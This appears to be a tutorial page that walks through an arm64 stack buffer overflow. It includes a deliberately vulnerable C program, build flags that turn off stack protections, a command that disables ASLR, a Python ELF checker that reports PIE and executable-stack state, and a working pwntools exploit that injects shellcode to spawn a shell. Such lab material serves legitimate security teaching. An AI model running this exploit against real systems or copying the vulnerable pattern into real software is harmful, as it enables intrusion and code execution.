# Stack Shellcode - arm64
Find an introduction to arm64 in:
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %} arm64-basic-assembly.md {% endcontent-ref %}
## Code

```c
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
    vulnerable_function();
    return 0;
}
```
Compile without PIE, canary and NX:

{% code overflow="wrap" %}
```bash
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
```
{% endcode %}
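As an added defender-side check (not code from the original page), the following Python reads only the ELF header and program headers to report what those flags leave behind: `-no-pie` produces an `ET_EXEC` image instead of `ET_DYN`, and `-z execstack` marks the `PT_GNU_STACK` segment executable. The sample images it inspects are constructed in-line; `check_file` runs the same check on a real binary such as `./bof`. Detecting the missing stack canary would need symbol-table parsing and is not covered here.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3           # -no-pie gives ET_EXEC, default PIE gives ET_DYN
EM_AARCH64 = 183
PT_GNU_STACK = 0x6474E551        # segment whose flags tell the loader about the stack
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4

def check_mitigations(elf_bytes):
    """Report PIE and NX-stack state of a little-endian ELF64 image (header + phdrs only)."""
    if elf_bytes[:4] != ELF_MAGIC or elf_bytes[4] != 2 or elf_bytes[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_type, e_machine, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum) = struct.unpack_from("<HHIQQQIHHH", elf_bytes, 16)
    stack_flags = None
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf_bytes, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
    return {
        "aarch64": e_machine == EM_AARCH64,
        "pie": e_type == ET_DYN,
        # NX only when PT_GNU_STACK is present and lacks PF_X; a missing header
        # leaves the decision to the kernel default, so it is reported as not NX
        "nx_stack": stack_flags is not None and not (stack_flags & PF_X),
    }

def check_file(path):
    """Run the same check on a binary on disk, e.g. the ./bof built above."""
    with open(path, "rb") as f:
        return check_mitigations(f.read())

def build_sample_elf(e_type, stack_flags):
    """Constructed minimal ELF64 image with one optional PT_GNU_STACK header (test data only)."""
    phdrs = b""
    if stack_flags is not None:
        phdrs = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8)   # ELF64, little-endian, v1
    header = struct.pack("<16sHHIQQQIHHHHHH", ident, e_type, EM_AARCH64, 1, 0x400000,
                         64, 0, 0, 64, 56, 1 if phdrs else 0, 64, 0, 0)
    return header + phdrs

def weak_build():
    """What `-no-pie -z execstack` leaves behind: ET_EXEC and an RWX stack segment."""
    return check_mitigations(build_sample_elf(ET_EXEC, PF_R | PF_W | PF_X))

def hardened_build():
    """Default clang output: PIE and a read/write-only stack segment."""
    return check_mitigations(build_sample_elf(ET_DYN, PF_R | PF_W))
```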
## No ASLR & No canary - Stack Overflow

To disable ASLR execute:

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

To get the offset of the bof check this link.

Use:
```python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: " + str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()
```
The only "complicated" thing to find here is the address in the stack to call. In my case I generated the exploit with the address I found using gdb, but then when exploiting it didn't work (because the stack address changed a bit).

I opened the generated core file (`gdb ./bof ./core`) and checked the real address of the start of the shellcode.